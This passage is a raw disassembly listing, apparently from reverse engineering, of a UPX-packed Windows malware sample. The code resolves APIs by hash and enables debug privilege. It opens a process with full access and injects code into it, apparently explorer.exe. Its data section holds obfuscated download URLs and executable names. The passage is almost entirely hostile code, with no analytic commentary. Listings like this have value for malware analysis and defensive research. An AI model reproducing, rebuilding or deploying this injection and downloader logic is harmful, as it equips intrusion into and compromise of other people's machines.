push offset aCM_unpackerPac ; "C:\\m_unpacker\\packed.exe"
push 0
call eax
push 0D89AD05h
push 1
call sub_4010DC
pop ecx
pop ecx
call eax
cmp dword_404104, 0Ch
mov esi, eax
jl short loc_402AB0
inc dword_404104
loc_402AB0: ; CODE XREF: sub_402908+1A0�j
cmp dword_404104, 0E1h
jle short loc_402AC6
mov dword_404104, 24h
loc_402AC6: ; CODE XREF: sub_402908+1B2�j
push 80DBBE07h
push 6
call sub_4010DC
pop ecx
pop ecx
lea ecx, [ebp+arg_4]
push ecx
push 20h
push esi
call eax
test eax, eax
mov esi, offset dword_404108
mov ebx, 723EB0D5h
jz loc_402B9D
push 10h
push esi
push offset aPfgfavdsqjujof ; "PfGfavdSqjujofdf"
call sub_401000
push 1B3D12B9h
push 6
call sub_4010DC
add esp, 14h
lea ecx, [ebp+var_8]
push ecx
push esi
push 0
call eax
test eax, eax
jz loc_402B9D
mov eax, dword_404104
add eax, 0FFFFFFEEh
cmp eax, 0B5h
ja short loc_402B31
inc dword_404104
loc_402B31: ; CODE XREF: sub_402908+221�j
mov eax, [ebp+var_8]
mov edi, [ebp+arg_4]
mov [ebp+var_14], eax
mov eax, [ebp+var_4]
push 7A2167DCh
push 6
mov [ebp+var_18], 1
mov [ebp+var_10], eax
mov [ebp+var_C], 2
call sub_4010DC
pop ecx
pop ecx
xor ecx, ecx
push ecx
push ecx
push ecx
lea edx, [ebp+var_18]
push edx
push ecx
push edi
call eax
mov edi, [ebp+arg_4]
push ebx
push 1
call sub_4010DC
pop ecx
pop ecx
push edi
call eax
push 61h
pop eax
push 50h
pop ecx
loc_402B7F: ; CODE XREF: sub_402908+28C�j
cmp ecx, 0CDh
ja short loc_402B89
inc eax
inc ecx
loc_402B89: ; CODE XREF: sub_402908+27D�j
add eax, 2Bh
add ecx, 2Bh
cmp eax, 0ACh
jl short loc_402B7F
mov dword_404104, eax
jmp short loc_402BA2
; ---------------------------------------------------------------------------
loc_402B9D: ; CODE XREF: sub_402908+1E1�j
; sub_402908+20E�j
mov eax, dword_404104
loc_402BA2: ; CODE XREF: sub_402908+293�j
cmp eax, 8Fh
jge short loc_402BAF
inc eax
mov dword_404104, eax
loc_402BAF: ; CODE XREF: sub_402908+29F�j
push 8
pop ecx
push 0Ch
xor eax, eax
push esi
lea edi, [ebp+var_38]
push offset aFSolqfqFF ; "f{solqfq-f{f"
rep stosd
call sub_401000
add esp, 0Ch
push esi
lea eax, [ebp+var_38]
push eax
call dword_403000 ; lstrcpy
lea eax, [ebp+var_38]
push eax
call sub_401436
mov esi, eax
test esi, esi
pop ecx
jz short loc_402C5A
push 3Ah
pop eax
push 28h
pop ecx
loc_402BEA: ; CODE XREF: sub_402908+2F7�j
cmp ecx, 0C5h
ja short loc_402BF4
inc eax
inc ecx
loc_402BF4: ; CODE XREF: sub_402908+2E8�j
add eax, 18h
add ecx, 18h
cmp eax, 97h
jl short loc_402BEA
push 99A4299Dh
push 1
mov dword_404104, eax
call sub_4010DC
pop ecx
pop ecx
push esi
push 0
push 1F0FFFh
call eax
mov esi, eax
test esi, esi
jz short loc_402C5A
push 0
push esi
push offset sub_40275A
call sub_4023D3
add esp, 0Ch
cmp dword_404104, 0A8h
jge short loc_402C46
inc dword_404104
loc_402C46: ; CODE XREF: sub_402908+336�j
push ebx
push 1
call sub_4010DC
pop ecx
pop ecx
push esi
call eax
jmp short loc_402C5A
; ---------------------------------------------------------------------------
loc_402C55: ; CODE XREF: sub_402908+19�j
call sub_401B6E
loc_402C5A: ; CODE XREF: sub_402908+2DA�j
; sub_402908+31A�j ...
push 2
pop eax
push 0FFFFFFE2h
pop ecx
loc_402C60: ; CODE XREF: sub_402908+36D�j
cmp ecx, 0CCh
ja short loc_402C6A
inc eax
inc ecx
loc_402C6A: ; CODE XREF: sub_402908+35E�j
add eax, 14h
add ecx, 14h
cmp eax, 0B8h
jl short loc_402C60
push 95902B19h
push 1
mov dword_404104, eax
call sub_4010DC
pop ecx
pop ecx
push 0
call eax
loc_402C8E: ; CODE XREF: sub_402908+16E�j
pop edi
pop esi
pop ebx
leave
retn 0Ch
sub_402908 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_402CA0 proc near ; CODE XREF: sub_401436+8�p
push ecx
lea ecx, [esp+4]
sub ecx, eax
sbb eax, eax
not eax
and ecx, eax
mov eax, esp
and eax, 0FFFFF000h
loc_402CB4: ; CODE XREF: sub_402CA0+29�j
cmp ecx, eax
jb short loc_402CC2
mov eax, ecx
pop ecx
xchg eax, esp
mov eax, [eax]
mov [esp+0], eax
retn
; ---------------------------------------------------------------------------
loc_402CC2: ; CODE XREF: sub_402CA0+16�j
sub eax, 1000h
test [eax], eax
jmp short loc_402CB4
sub_402CA0 endp
; ---------------------------------------------------------------------------
align 4
dd 0CDh dup(0)
dword_403000 dd 77E73167h ; DATA XREF: sub_401436+266�r
; sub_401B6E+12A�r ...
dword_403004 dd 77E76A2Eh ; DATA XREF: sub_401436+1BD�r
; sub_401436+22B�r ...
dword_403008 dd 77E74672h ; DATA XREF: sub_401436+14A�r
; sub_401436+196�r
dword_40300C dd 77E74155h ; DATA XREF: sub_401436+284�r
; sub_401721+90�r ...
dd 0
dword_403014 dd 77D4C96Ah ; DATA XREF: sub_401B6E+F4�r
; sub_401B6E+658�r ...
dd 0
dword_40301C dd 6F666B70h, 2D31306Fh, 6F6F67h ; DATA XREF: sub_4010DC+A9�o
dword_403028 dd 6E6F7176h, 672D6D6Ch, 6F6Fh ; DATA XREF: sub_4010DC+9A�o
dword_403034 dd 6A6D6A74h, 2D77666Dh, 6F6F67h ; DATA XREF: sub_4010DC+8B�o
; sub_401B6E+14�o
dword_403040 dd 73627073h, 6F672D6Ah, 6Fh ; DATA XREF: sub_4010DC+7C�o
dword_40304C dd 62756762h, 31306A73h, 6F6F672Dh, 0 ; DATA XREF: sub_4010DC+6D�o
dword_40305C dd 70716675h, 2D6D6C6Ah, 6F6F67h ; DATA XREF: sub_4010DC+47�o
dword_403068 dd 7Dh ; DATA XREF: sub_401436+26F�o
dword_40306C dd 6B607570h, 2D77706Ch, 667B66h ; DATA XREF: sub_401436+1EF�o
aUfq24 db 'ufq24',0 ; DATA XREF: sub_401721+7B�o
align 10h
aJg db '%jg>',0 ; DATA XREF: sub_401B6E+7A7�o
align 4
aLgf1 db '%`lgf1>',0 ; DATA XREF: sub_401B6E+6E8�o
aV db '&v',0 ; DATA XREF: sub_401B6E+643�o
align 4
aNobjtSksBguBgu db 'nobjt{-sks<bgu>bgu75;%`lgf2>',0 ; DATA XREF: sub_401B6E+600�o
align 4
aGrurkqn db 'grurkqn',0 ; DATA XREF: sub_401B6E+559�o
aLljOzaSks db 'llj{oza-sks',0 ; DATA XREF: sub_401B6E+4EA�o
aWeGgmaazSks db 'we{ggmaaz-sks',0 ; DATA XREF: sub_401B6E+47E�o
align 4
aPwhHSks db 'pwh`h-sks',0 ; DATA XREF: sub_401B6E+412�o
align 4
aRrqngodlSks db 'rrqngodl-sks',0 ; DATA XREF: sub_401B6E+3A6�o
align 4
aBdytedrbwuSks db 'bdytedrbwu-sks',0 ; DATA XREF: sub_401B6E+33A�o
align 4
aUptfnbHkk db 'uptfnb{hkk',0 ; DATA XREF: sub_401B6E+2E0�o
align 10h
a9 db '`9',0 ; DATA XREF: sub_401B6E+29E�o
; sub_401B6E+369�o ...
align 4
aQeAvjfpSksBguB db 'qe{avjfp-sks<bgu>bgu75;',0 ; DATA XREF: sub_401B6E+26C�o
a9_ db '`9_',0 ; DATA XREF: sub_401B6E+235�o
; sub_401B6E+5A4�o
aKwws9RataoIhad db 'kwws9,,ratao`ihad-`ln,sqldp,hdntaoj,',0
; DATA XREF: sub_401B6E:loc_401D89�o
align 4
aKwws9AQumzfpLn db 'kwws9,,{a{{qumzfp-`ln,sqldp,hdntaoj,',0 ; DATA XREF: sub_401B6E+214�o
align 10h
a_wfiperoFF db '_wfipero-f{f',0 ; DATA XREF: sub_401B6E+1C2�o
align 10h
a_AtqFF db '_`atq-f{f',0 ; DATA XREF: sub_401B6E+1A8�o
align 4
a_vogqdpqFF db '_vogqdpq{-f{f',0 ; DATA XREF: sub_401B6E+18E�o
align 4
a_irlsjnFF db '_irlsjn-f{f',0 ; DATA XREF: sub_401B6E+174�o
a_eobfFF db '_eobf-f{f',0 ; DATA XREF: sub_401B6E+15A�o
align 4
a_NaksruFF db '_{naksru-f{f',0 ; DATA XREF: sub_401B6E+140�o
align 4
a_bhebVsuFF db '_bheb{vsu-f{f',0 ; DATA XREF: sub_401B6E+11B�o
align 4
aG db '&g',0 ; DATA XREF: sub_401B6E+E2�o
align 4
a@9_ db '@9_',0 ; DATA XREF: sub_401B6E+B9�o
aHfqmfo01Goo db 'hfqmfo01-goo',0 ; DATA XREF: sub_401B6E+4F�o
align 4
aVpfq01Goo db 'vpfq01-goo',0 ; DATA XREF: sub_401B6E+34�o
align 4
aPfgfavdsqjujof db 'PfGfavdSqjujofdf',0 ; DATA XREF: sub_402908+1EA�o
align 4
aMwgooGoo db 'mwgoo-goo',0 ; DATA XREF: sub_4023D3+105�o
align 4
aMwnbsujftlepfW db 'MwNbsUjftLePf`wjlm',0 ; DATA XREF: sub_4023D3+EA�o
align 4
a_puKlpwFF db '_pu`klpw-f{f',0 ; DATA XREF: sub_40275A+9E�o
align 4
aFSolqfqFF db 'f{solqfq-f{f',0 ; DATA XREF: sub_402908+CF�o
; sub_402908+2B2�o
align 4
dd 369h dup(0)
aCM_unpackerPac db 'C:\m_unpacker\packed.exe',0 ; DATA XREF: sub_40237B+F�o
; sub_402908+17E�o
align 4
dd 3Ah dup(0)
dword_404104 dd 0C1h ; DATA XREF: sub_4010DC+3�r
; sub_4010DC+15�w ...
dword_404108 dd 6C64746Eh, 6C642E6Ch, 6Ch, 3Dh dup(0) ; DATA XREF: sub_4010DC+41�o
; sub_4010DC+67�o ...
byte_404208 db 1 ; DATA XREF: sub_4012A6+24�r
; sub_4012A6+62�w
byte_404209 db 1 ; DATA XREF: sub_4012A6:loc_4012C1�r
; sub_4012A6+32�w
align 4
dword_40420C dd 0 ; DATA XREF: sub_40275A+123�o
; sub_40275A+143�r
dword_404210 dd 0 ; DATA XREF: sub_40275A+13D�r
; sub_40275A+15A�r
align 2000h
UPX0 ends
; Section 2. (virtual address 00006000)
; Virtual size : 00002000 ( 8192.)
; Section size in file : 00002000 ( 8192.)
; Offset to raw data for section: 00006000
; Flags E0000040: Data Executable Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure code
; Segment permissions: Read/Write/Execute
UPX1 segment para public 'CODE' use32
assume cs:UPX1
;org 406000h
assume es:nothing, ss:nothing, ds:UPX0, fs:nothing, gs:nothing
dword_406000 dd 58h, 2000h, 74736C01h, 79706372h, 6C010041h, 63727473h
; DATA XREF: start+1�o
dd 4169706Dh, 736C0100h, 656C7274h, 100416Eh, 7274736Ch
dd 41746163h, 650000h, 20140000h, 77010000h, 69727073h
dd 4166746Eh, 0
dd 13E40000h, 620062Bh, 2 dup(6090609h), 28180F0Dh, 2763111Bh
dd 8060C19h, 0C192F0Fh, 92A510Ch, 9440C06h, 0B771027h
dd 2509611Dh, 110C0A4Ch, 3D080C1Dh, 16082813h, 170D1936h
dd 400C0616h, 3D241606h, 770C060Ch, 135E103Ah, 0C561070h
dd 9591029h, 6740B1Dh, 123E1B20h, 13290812h, 150B0526h
dd 1A1A1A1Ah, 70E441Ah, 4232371Ah, 323D2F5Ah, 323A323Ah
dd 4B3A353Ah, 0C060935h, 8102B0Ch, 38154216h, 1B19102Bh
dd 3D2E1909h, 14702C0Ch, 94E0C29h, 60B0C06h, 285C0813h
dd 571B1514h, 103F1141h, 6092C6Ah, 609340Ch, 638220Ch
dd 0E242716h, 5061B16h, 60A1612h, 609410Ch, 150B890Ch
dd 0C0E1F39h, 60B1A28h, 2A13220Ch, 0D076A10h, 1F391510h
dd 3D0C0Eh, 4550h, 4014Ch, 462E49D3h, 2 dup(0)
dd 10200E0h, 8010Bh, 1E00h, 0C00h, 0
dd 2908h, 1000h, 3000h, 400000h, 1000h, 200h, 4, 0
dd 4, 0
dd 6000h, 400h, 0
dd 4000002h, 100000h, 1000h, 100000h, 1000h, 0
dd 10h, 2 dup(0)
dd 325Ch, 3Ch, 6 dup(0)
dd 5000h, 1D4h, 0Ch dup(0)
dd 3000h, 1Ch, 6 dup(0)
dd 7865742Eh, 74h, 1CCBh, 1000h, 1E00h, 400h, 3 dup(0)
dd 60000020h, 6164722Eh, 6174h, 30Ah, 3000h, 400h, 2200h
dd 3 dup(0)
dd 40000040h, 7461642Eh, 61h, 21Ch, 4000h, 5 dup(0)
dd 0C0000040h, 6C65722Eh, 636Fh, 220h, 5000h, 400h, 2600h
dd 3 dup(0)
dd 42000040h, 5000h, 32B4h, 504Ah, 512C00h, 59086A00h
dd 2978F0Ah, 27944140h, 0D6FFF7B0h, 7DF80266h, 8568EB7Ch
dd 57FDC943h, 0C3A550A3h, 20C2EEFEh, 75395351h, 0A84268FCh
dd 2C509E6Fh, 56BBB1D8h, 835FEB13h, 837C0A86h, 0FBE66095h
dd 0AC4B3E1h, 260B05C7h, 5CCDAC84h, 4885D969h, 61BE168Bh
dd 0FF6A1DDFh, 0B0D5684Bh, 5B28723Eh, 0CEC36403h, 5E08CE16h
dd 3A23E26Fh, 5F7C23C2h, 0B80D5B5Eh, 1C541318h, 0EF097F9Ch
dd 3DB46341h, 6819DA86h, 774393E8h, 49BABE17h, 63BB3A2Dh
dd 0FCE87E53h, 335DFB27h, 909B7C91h, 56A8AC4h, 1151F4F1h
dd 64B6BA1h, 0EC210B10h, 75D0B3A0h, 6853D4A1h, 38609702h
dd 32F76332h, 1C1CC749h, 7C0EBA3Dh, 1EE8ACE9h, 45F7FBA1h
dd 3FFF53F4h, 323A860Fh, 0B63B66BFh, 8B0864E9h, 0F6854CB4h
dd 443B0A49h, 4E6C0B6Eh, 0A8A340D5h, 0A5EEA59Bh, 0F6335627h
dd 41083h, 3765395h, 0F8F1D811h, 98E8858Dh, 0C0E5056h
dd 0EDBBEC06h, 0B140F875h, 16C9680Ch, 0ECB2189Fh, 0DB6D6B3Bh
dd 0F00504C8h, 8CAF20ACh, 72185F19h, 0C3353F82h, 219168F0h
dd 0D921E6B1h, 336E4FBh, 0CD3556FEh, 8BD359F7h, 7108FB35h
dd 44D6FF50h, 66968047h, 0E9BDDDECh, 850F3A10h, 5CEA0C3Ah
dd 4FFBF82Dh, 0F08B2A66h, 804E01EBh, 5C0E35BCh, 0C672F575h
dd 0FFE76DEDh, 7E424B15h, 1B87A93Ah, 1E02EEFBh, 5435848Dh
dd 69042650h, 0B4F0B9D7h, 4576DD85h, 3A858426h, 6CE4056Ch
dd 0C4391807h, 0FC8657A4h, 6C010FE6h, 7F9D1E8h, 6A8A94F7h
dd 821DB907h, 51E8FCDDh, 8BA100CEh, 99B27B00h, 6DA8FC19h
dd 80577374h, 23DD9177h, 0FF7C6074h, 240351B4h, 0F90C2D59h
dd 0FD3A3366h, 6B0301FFh, 687F8F30h, 578D51E8h, 0F849731Dh
dd 0E9EDBA06h, 8BC820E4h, 6316481Ah, 1DBC9299h, 46B3AE07h
dd 0F480A170h, 6C7663ADh, 243946F7h, 33D2820Fh, 3D1805EBh
dd 9AFCF9AFh, 0EA242331h, 0B7087C7Ah, 0BB7613ADh, 0DDADB33h
dd 0EC02FCDAh, 0A42E40C7h, 0D0E045F6h, 0D1860F07h, 6456DC37h
dd 6042E18h, 10F78452h, 532C9FFEh, 34D48168h, 89036A05h
dd 3147E875h, 22B7A71Ah, 93C02AF6h, 0F663E43Ch, 0F85AE878h
dd 496AF784h, 3BA5B75Bh, 0E484E914h, 147CA459h, 0CBCF1ACFh
dd 8A3D1A1Ah, 68BE94ECh, 25CCC3D7h, 8593DE9h, 176200BAh
dd 0FC6D808Fh, 0B87DBD66h, 1CF4EA57h, 0CE998540h, 1BF475DAh
dd 0DA070EE4h, 0C80CDF61h, 78681BA9h, 5D1AD09Ch, 0D2CB62C0h
dd 2E00C57h, 0E4741840h, 5061908h, 32F22A6Ah, 0E2E2B349h
dd 3D1212A8h, 261BBA5h, 0E027683Fh, 751D2F5Ch, 0B3FC7D89h
dd 0C0E9EEAh, 92688324h, 0F6B70B20h, 0EC454C4Fh, 0FBFF888Dh
dd 8FDE4AE2h, 792D0F76h, 1B87DCB0h, 3DA99E2Ah, 927BB683h
dd 0F114FF2Fh, 685308F8h, 53571B80h, 6CB2C2C0h, 404B7285h
dd 2700560Ch, 0F0C34E18h, 0B8F0FBB5h, 1096C362h, 0C02129DAh
dd 555682B7h, 4EC41E9Fh, 5B2E81FBh, 67F8C095h, 0AAC16C2Fh
dd 6C77759Ch, 3A64EB70h, 5D6574C3h, 0EFEFB5B6h, 3FD1C368h
dd 0DC5D790Fh, 0CC36D8C7h, 0DC3CD64Dh, 797CF046h, 0F611B176h
dd 73798716h, 0B760F206h, 97772039h, 0B63DC1F0h, 92176DF3h
dd 13EB6409h, 0FE3DFE24h, 0EB360B03h, 5D88097Eh, 0A104EB10h
dd 64266B28h, 0AEB3901h, 64AA27D4h, 68F4A903h, 0E314FB0Ch
dd 0F25116Ah, 8BE82182h, 0C8A03DCFh, 1D0A50B3h, 0C580018Ch
dd 68FC3C86h, 0AEF7CBF1h, 96C1F034h, 0D4984B66h, 0E4D9D74Bh
dd 33B0C75Bh, 179A1CC3h, 0B574233Bh, 0F897ED5h, 7D05E4A8h
dd 0A8EB3809h, 0E9587CE0h, 5A25A2CCh, 488D27E6h, 468DDDFEh
dd 4103968h, 284FEB03h, 0C7FF0A74h, 4F0547C7h, 3B774E3Dh
dd 458D406Ah, 4FD19488h, 84F99770h, 0C79B9A44h, 5646318Ah
dd 1296366Ah, 0C584C893h, 4CD46F00h, 4ACEBB2Eh, 0C8830308h
dd 0AC3B84C8h, 60B84CFFh, 0FCB3D11Eh, 0E8345EC0h, 57BFF474h
dd 84A35FE6h, 211F305Fh, 9554E8FCh, 1A64323Ch, 39E8EC0Ch
dd 0D2CD24CBh, 98F34F3Dh, 0D6A41616h, 381121FAh, 30CB7A81h
dd 61B42752h, 0D3361111h, 161819CBh, 54C07432h, 23707701h
dd 0F5690336h, 9701F3CFh, 0D99FECDEh, 6D67B2DEh, 77D8F0E6h
dd 0CCD85D02h, 0E8E42863h, 2DD8FCA6h, 968556B8h, 14B06768h
dd 10F382Ah, 9A499659h, 2424C5F9h, 3427767Ch, 380D6A76h
dd 3D6803D4h, 2E7B3D8Bh, 0F7FB075Dh, 0D7FE4856h, 0B99C83F0h
dd 48E8C407h, 958191Fh, 23C9320Ch, 682EE8B8h, 24D8320Bh
dd 14E8AC8Fh, 9E0D4D78h, 9C3E4390h, 88F2FAE8h, 0C9E0E890h
dd 19C9B09Eh, 0E8808198h, 0B78C19C6h, 66A893F8h, 19DC7D81h
dd 612847Dh, 7B3D4D17h, 50C55E2h, 3DA2020Ch, 2D0BC007h
dd 40953BAh, 8BE06FC7h, 637DF01Dh, 0E08BC1E3h, 755624E5h
dd 26585107h, 7E6BF927h, 6DE83072h, 0B910FC48h, 2C7B13ECh
dd 0FD1953E8h, 0D61D82DCh, 0D30C505Ch, 0FEB8362Fh, 9C8F24B3h
dd 1CE81417h, 5ECB7619h, 347AD3A1h, 1D07962Bh, 0E083EC59h
dd 0E810BB21h, 2531F1EAh, 0D8285C26h, 751CDB56h, 1F246E5Ah
dd 0A73C819h, 0F1A8E804h, 720583A5h, 0FCE98001h, 10DCC8B9h
dd 0E591D86h, 4EE8F420h, 804B0C1Fh, 241CDFCAh, 0F18792DBh
dd 886B1836h, 5C8F9003h, 0E2E8E40Ch, 24ECA6F0h, 396301B4h
dd 986BF0B0h, 48B91E42h, 76E8D809h, 0A64AE48Bh, 2A726844h
dd 0C80D91E4h, 0EFD80AE8h, 5319173Fh, 200B0978h, 0B03BE8BCh
dd 0EF9EC810h, 5C34696Eh, 6E259324h, 136B07A8h, 0E8B48F20h
dd 246B032Fh, 92E0DA6Fh, 29127FA0h, 0F0286E0h, 24E46F8Ch
dd 894F70EDh, 0E46E5F13h, 0C19A32EEh, 0EC0B4920h, 0DA190183h
dd 0A61CD320h, 7C90FD19h, 0EE88E894h, 118E268h, 24C4C427h
dd 2A4360E1h, 86BB0ADAh, 0BF23C584h, 0FF579042h, 0E04B8164h
dd 50D0F243h, 0BFFFF863h, 0A8A3B61h, 80184C04h, 8800F97Dh
dd 675ED45h, 30EF45C6h, 0DBDBC0B4h, 0F91608EBh, 0EF0F1304h
dd 0C47F186Ah, 749CBC9Bh, 2D2D7430h, 9A56A23Dh, 7E4067B1h
dd 0D256EDEDh, 0E4669EFCh, 1704FC4Bh, 43EEECFDh, 0FD4796D8h
dd 29EE1904h, 0C7C808ECh, 0F0186E1Ah, 0E7077400h, 0EDA0E888h
dd 15F216DCh, 0E2963DB1h, 76DBED61h, 8B6695EDh, 0E4848A0Bh
dd 76DE578h, 0E67F84F6h, 88037430h, 587DE665h, 65243C7Dh
dd 0C8656F90h, 9EE7FC3Ch, 0E491B64Bh, 0E8E4BEE4h, 0C908F004h
dd 0E1E88047h, 139002ECh, 1847254Ah, 2FD982C3h, 19686B11h
dd 0F795902Bh, 4B6FC487h, 0DFBFA544h, 0BA81F0F0h, 0FC92A6BEh
dd 302B6Fh, 2C6832EBh, 8E129781h, 0FFB2780Eh, 267402F8h
dd 9972F568h, 0E868143Dh, 43F1AA03h, 0BF5780C9h, 5FC57499h
dd 6E3458C9h, 85C25E69h, 44DF1064h, 0D420BE29h, 3C485079h
dd 8389C803h, 0E16FED14h, 8B18418Dh, 1A083870h, 0BD1B42A7h
dd 4D898205h, 8FE45DDCh, 4F8BD1B0h, 0A08B638Ch, 85FF1420h
dd 2D583477h, 0F7F8DA09h, 90101BDFh, 0E7C42A13h, 0DFFDE13Ch
dd 3F65EA66h, 0EF0A25B7h, 4D5356E2h, 30362974h, 0C33BD0F0h
dd 5132E384h, 0AA5F65B5h, 9430A917h, 2405CDh, 582F04B0h
dd 8A622531h, 4C9190B9h, 0F40349A3h, 19E849Ch, 223A1219h
dd 8380C28h, 0A7EBFF5Bh, 2B32BC45h, 918A6F9h, 0E81C22B4h
dd 7193EB1Eh, 0EE3646F9h, 8B1FC0EAh, 7EBC88F0h, 518BED89h
dd 0F1E74EBDh
dd 815AF09Fh, 0F8B699FAh, 88B3C47h, 0DC2830Dh, 0E88CB3B2h
dd 0E8269F0Ah, 1D5238Bh, 0EE048C12h, 0FEC1BE55h, 8F0A8E0Ch
dd 0C9E03E2Dh, 74E87D8Bh, 8CE3F7FCh, 0A1AF597Eh, 0F915FA53h
dd 146F52C3h, 8B5880CEh, 14499B6Fh, 8580CC03h, 277CBC56h
dd 7EADDB6Dh, 0D68B2817h, 5589D72Bh, 82D650C3h, 7E25FFC8h
dd 34412F60h, 3886C703h, 975BE8Dh, 0ED067881h, 8BE168DFh
dd 3ED0907h, 408BED54h, 0C410302h, 0FFDC161Ah, 0C0A5EBB7h
dd 4001EB08h, 75183966h, 54040FAh, 6D972C8Ah, 0C8CBB623h
dd 47C670CFh, 0F63B1BC7h, 811B2F9Fh, 8BEB97FFh, 3D89F855h
dd 370C4956h, 5BFFFFF9h, 0FC1154A0h, 3A40088Ah, 803074CBh
dd 773F0F9h, 3C9B60Fh, 7B0FEBD1h, 307FED6Bh, 0C10FE183h
dd 0CE0B10E1h, 0ECB2530Eh, 2B260A01h, 751DEC7Eh, 8D40A9D9h
dd 0D53DF747h, 0F1BAB767h, 2B5147ECh, 8759A75h, 298B1020h
dd 0FEFF1973h, 0B3684475h, 12E61874h, 0A030B653h, 500CA491h
dd 87320E0Ah, 1AA77A51h, 0C027FC52h, 6834707Dh, 1DE02F68h
dd 92C66AAAh, 0F0C0C362h, 0C6011E6Fh, 5CAF95B3h, 23109410h
dd 5803EFC8h, 0A0BD89F9h, 286A1FFDh, 0AD55C933h, 58C46030h
dd 0DB2C4441h, 88C7C102h, 0E6AF8C2h, 0CD95670Fh, 20121077h
dd 90312861h, 0DDC3390Bh, 93F30D9Ch, 2119AD05h, 4C386A8Ah
dd 735727C8h, 0C001F73Dh, 87055343h, 4E3860B9h, 0C9737F0Ch
dd 22F14184h, 0B89AF068h, 0D0FF336Fh, 5380C900h, 195796F9h
dd 1D5DB583h, 0A8067B13h, 938ACD53h, 4AE023FDh, 6C49A137h
dd 32FE0104h, 0B4556CE8h, 3C22AEFEh, 7E7FEE8h, 0E2B0DE0Bh
dd 5E4B5B1Eh, 0F847E15Bh, 3D58296Ah, 40462AB4h, 2D31C683h
dd 0BDF0FE02h, 277F83A9h, 50576340h, 0C79C3589h, 28043736h
dd 2043050Dh, 6DB7B309h, 15668F0Bh, 77CBAE8h, 403B2346h
dd 0FE81E248h, 9A2F04E2h, 2502DB30h, 0B8CD0C74h, 15B60BAEh
dd 0A5570375h, 323EFFD3h, 32D8DDBBh, 250C0510h, 13666E0Bh
dd 63FB2CCFh, 8B164A9Bh, 0BF3B681Ch, 0F4537B88h, 27842E48h
dd 9D5E074Dh, 196060ACh, 0A260687Fh, 7853768Ah, 43CEDC33h
dd 3C34ABA0h, 0C49D8601h, 0CA415B90h, 32E96B9h, 0E42EC862h
dd 0BFDBAB04h, 0B80970E0h, 78BE95F0h, 95E2BC68h, 86F14C3Eh
dd 1BEEC52Fh, 948D14A5h, 8011C50Dh, 8B02B57Ah, 0BB1BE0DAh
dd 0C83B41FFh, 0B8BEC75h, 0B0020B8h, 7865A1C8h, 6FF26C70h
dd 999E3453h, 6F10044Bh, 0C726572h, 0CFC8CFE5h, 78652E08h
dd 9906C665h, 4802A1ADh, 0F5AAD09h, 0D98416B7h, 0C87D72CFh
dd 0E4174CDEh, 0ABF3F810h, 1BE61DE8h, 0BFE909C8h, 308AAB11h
dd 7459F685h, 583A6A73h, 2074BA20h, 19189540h, 34183D18h
dd 0E92AC681h, 2DCF9A26h, 0C9560DB1h, 0CE1F5968h, 686C8640h
dd 363374D4h, 5A17A0h, 1A1382D9h, 187D7AA8h, 0A9C3287Ch
dd 0BF8A1C5Fh, 0C1E83F0h, 514FB68h, 2524B4ADh, 22175E2Bh
dd 72033F6Ah, 24E1D521h, 24DBBE07h, 80E92616h, 0C1F066Ah
dd 8714206Fh, 12423785h, 0AEC780BBh, 1F37B027h, 8191083h
dd 0B9E504E8h, 351B3D12h, 413EE408h, 0DD51F8BBh, 30FA8CC9h
dd 390081E2h, 39B53DEEh, 0E055744h, 0ECB9E4F8h, 37B47370h
dd 2167DCCBh, 42F3407Ah, 1648481Bh, 99D5ADDh, 816B02F4h
dd 0EF5B7C7Bh, 558D0051h, 34D152E8h, 0C32F0B34h, 616A783Bh
dd 11CD5077h, 2B932F22h, 70AC3D2Bh, 15832584h, 86E78F92h
dd 0E2421792h, 0B676E43Ah, 364A864Ah, 0A641D8D9h, 0BE9135Ah
dd 0B349326Ah, 0E275DB95h, 761614CCh, 3D14F268h, 0B07511B8h
dd 791C0FECh, 0CC238h, 0FE2D00CCh, 4C3FB837h, 1BC85624h
dd 23D0F7C0h, 0CAC48BC8h, 952FFD52h, 0A7231F0h, 9459C18Bh
dd 0E589008Bh, 0D1750A3Fh, 3985352Dh, 0FF00CB53h, 644107h
dd 6F666B70h, 2D31306Fh, 0F63EDD67h, 7600056Fh, 6C6E6F71h
dd 74000A6Dh, 66016D6Ah, 6B3F777h, 70730C8Fh, 164262h
dd 0C756762h, 305DF60Dh, 66750030h, 346A7071h, 0B7BF777Dh
dd 75700FDFh, 706C6B60h, 667B6637h, 1334321Bh, 0FF676A25h
dd 3EBFF6EDh, 6C60252Bh, 0A316667h, 6E0B7626h, 746A626Fh
dd 0B1732D7Bh, 6BEEBBB1h, 3E523C73h, 3B353703h, 0BF2B3220h
dd 67FFFEF5h, 6B727572h, 6C006E71h, 6F7B6A6Ch, 6128617Ah
dd 67677B65h, 7C4B606Dh, 7A6161EFh, 0E9776B0Dh, 0CDDF0B68h
dd 7272ED6Eh, 6C64832Ch, 7964A70Eh, 0E5646574h, 72F7BBFFh
dd 11757762h, 667470A7h, 687B626Eh, 6B6Bh, 0D90B3960h
dd 4B71B605h, 70663461h, 0FDBF1B81h, 5FBFFFh, 7377776Bh
dd 722C2C39h, 6F617461h, 61686960h, 6E972D64h, 6C71732Ch
dd 0FDCA57B0h, 682C7064h, 79156E64h, 98172763h, 7B485BFBh
dd 6D75717Bh, 5F274C7Ah, 0F12C22FBh, 70696677h, 0F146FE0h
dd 0B7615960h, 0C716C1Fh, 676F765Fh, 7B712F71h, 0B6385B0Fh
dd 6C7269F0h, 5F0D6E5Fh, 17662465h, 0FB42B27h, 0A9616E7Bh
dd 68624314h, 0B7608596h, 7376CE65h, 40675310h, 0E850B097h
dd 0B67368BBh, 0FF769F6Fh, 70B587EDh, 66500D10h, 64F46647h
dd 756A7153h, 79666F6Ah, 64B1DC10h, 1A776D47h, 4E774DDBh
dd 617B70CEh, 4C741455h, 77602A65h, 9BF667D6h, 0D0081Bh
dd 6C6F7306h, 0CBE6671h, 87204882h, 21441900h, 0A9B226Bh
dd 7F090082h, 580A2E79h, 736C0120h, 0C8637274h, 70E41F67h
dd 706D4179h, 6C144169h, 4FFE6E65h, 74617DB3h, 14653141h
dd 72707377h, 66746E69h, 0E7FF20FFh, 13E40113h, 620062Bh
dd 180F0D09h, 63111B28h, 0FEDEDFFFh, 60C1927h, 52F0F08h
dd 142A510Ch, 2709440Ch, 1D0B7710h, 4C250961h, 0FFFF6FDBh
dd 1D110C0Ah, 133D080Ch, 36160828h, 16170D19h, 1606401Ch
dd 0C2E3D24h, 0FFFF6FFFh, 5E103A77h, 56107013h, 5910290Ch
